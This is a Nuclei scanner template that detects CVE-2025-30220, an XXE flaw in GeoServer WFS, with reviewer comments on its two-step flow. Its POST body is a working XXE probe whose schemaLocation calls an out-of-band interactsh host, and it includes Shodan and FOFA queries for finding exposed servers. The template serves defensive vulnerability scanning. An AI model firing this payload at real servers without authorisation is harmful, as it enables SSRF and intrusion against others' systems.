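# Nuclei template: CVE-2025-30220 (GeoServer WFS XXE, CWE-611).
#
# The page copy had lost all indentation, which makes the document
# unparseable as YAML (nested keys collapsed to top level, sequence
# items followed by same-column mapping keys). Re-indented here with
# the conventional 2-space / indented-sequence layout used by nuclei
# templates; every scalar value is reproduced unchanged.
#
# NOTE(review): the trailing "# digest:" signature line from the
# original file is intentionally left as-is and was not recomputed
# after the re-indent, so nuclei template-signature verification may
# report a mismatch until the maintainer re-signs the template.
#
# Detection logic (two requests, chained with `flow`):
#   http(1) - GET GetCapabilities on the common WFS/OWS endpoints; the
#             internal matcher confirms a WFS capabilities document and
#             the xpath extractor captures the first FeatureType name
#             into `featuretype` for use by the second request.
#   http(2) - POST a GetFeature whose xsi:schemaLocation points at the
#             interactsh host; the finding is only reported when an
#             out-of-band DNS interaction is observed AND the response
#             carries a java.lang.NullPointerException with HTTP 200.
#
# Mitigation: the vendor advisory and the GeoServer production
# configuration guide (see `reference`) cover disabling external
# entity resolution; the condition is limited to unpatched versions.

id: CVE-2025-30220

info:
  name: GeoServer WFS - XXE Processing Vulnerability
  author: iamnoooob,pdresearch,darses
  severity: critical
  description: |
    GeoServer Web Feature Service (WFS) is vulnerable to an XML External Entity (XXE) processing attack due to improper handling of XML input. This vulnerability allows attackers to perform Out-of-Band (OOB) data exfiltration and Server-Side Request Forgery (SSRF) by exploiting the GeoTools library.
  reference:
    - https://github.com/geoserver/geoserver/security/advisories/GHSA-jj54-8f66-c5pc
    - https://docs.geoserver.org/latest/en/user/production/config.html#production-config-external-entities
    - https://github.com/geonetwork/core-geonetwork/pull/8757
    - https://github.com/geonetwork/core-geonetwork/pull/8803
    - https://github.com/geonetwork/core-geonetwork/pull/8812
    - https://geoserver.org/vulnerability/2025/06/10/cve-disclosure.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
    cvss-score: 9.9
    cve-id: CVE-2025-30220
    cwe-id: CWE-611
    epss-score: 0.04607
    epss-percentile: 0.88838
  metadata:
    verified: true
    # Two requests x four candidate paths each; stop-at-first-match on
    # both keeps the real count at or below this ceiling.
    max-request: 8
    vendor: osgeo
    product: geoserver
    shodan-query:
      - title:"geoserver"
      - 'http.html_hash:1093634893 "Content-Disposition: inline"'
      - http.favicon.hash:97540678
      - html:"/geoserver/"
    fofa-query:
      - title="geoserver"
      - app="geoserver"
      - icon_hash="97540678"
      - body="/geoserver/"
  tags: cve,cve2025,geoserver,xxe,oast,oob,ssrf,unauth,vkev

# The second request depends on the `featuretype` value extracted by
# the first, so the requests must run in order.
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/geoserver/wfs?service=WFS&request=GetCapabilities"
      - "{{BaseURL}}/geoserver/ows?service=WFS&request=GetCapabilities"
      - "{{BaseURL}}/wfs?service=WFS&request=GetCapabilities"
      - "{{BaseURL}}/ows?service=WFS&request=GetCapabilities"

    stop-at-first-match: true
    matchers:
      # Fingerprint only: `internal: true` keeps this from being
      # reported as a finding on its own.
      - type: dsl
        internal: true
        dsl:
          - 'contains(body, "wfs:WFS_Capabilities")'
          - 'contains(content_type, "application/xml")'
          - "status_code == 200"
        condition: and

    extractors:
      - type: xpath
        name: featuretype
        internal: true
        xpath:
          - /wfs:WFS_Capabilities/FeatureTypeList/FeatureType[1]/Name

  - method: POST
    path:
      - "{{BaseURL}}/geoserver/wfs?service=WFS"
      - "{{BaseURL}}/geoserver/ows?service=WFS"
      - "{{BaseURL}}/wfs?service=WFS"
      - "{{BaseURL}}/ows?service=WFS"

    stop-at-first-match: true
    headers:
      Content-Type: "application/xml;charset=UTF-8"
    # Literal block scalar: the XML is sent with its newlines intact.
    body: |
      <wfs:GetFeature service="WFS" version="1.0.0"
        xmlns:wfs="http://www.opengis.net/wfs"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://a http://{{interactsh-url}}/xxe.xsd">
        <wfs:Query typeName="§featuretype§"/>
      </wfs:GetFeature>

    matchers:
      # All three conditions are required, which limits false positives
      # from servers that merely return an NPE or merely resolve DNS.
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(body, "java.lang.NullPointerException")'
          - "status_code == 200"
        condition: and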
# digest: 4b0a00483046022100f73cec8df8a613b4f126fc3220430abe2d3e316ac67e2626c550e50929f4bfba022100dd6a2c5fed15006e99380231ea0b18b2095b1b80a0ff394dc8cee4eac64e9c23:922c64590222798bb761d5b6d8e72950